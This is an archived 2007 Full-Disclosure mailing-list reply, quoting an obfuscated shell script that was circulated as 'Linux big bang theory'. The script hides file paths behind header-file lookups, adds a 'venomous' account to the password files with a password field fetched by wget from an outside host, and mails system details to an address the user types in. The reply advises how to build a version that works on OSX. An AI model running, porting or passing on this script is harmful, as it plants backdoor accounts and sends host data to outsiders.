lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sun, 13 May 2007 22:43:36 -0400
From: Valdis.Kletnieks@...edu
To: Just1n T1mberlake <hotpackets@...lokitty.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Linux big bang theory....

On Mon, 14 May 2007 08:47:39 +0800, Just1n T1mberlake said:
> Confirmed Macosx is not vulnerable to this.

Not this variant, anyhow.  Note that if you go digging around, you can
probably find other places to seed $happy, $days, $who, and $what from.

> > happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
> > days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
> > guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
> > sed -n '1p' $happy|awk -F ":" 
> > 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
> > sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F 
> > ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
> > what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
> > who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, 
> > ""){print $4" -a"}'`
> > echo "Enter your email address" ; read ans ; where=$ans
> > $who | $what $where

One carefully coded 'find ... | xargs egrep' will get you the needed info
to produce a version that will work on OSX.

Content of type "application/pgp-signature" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ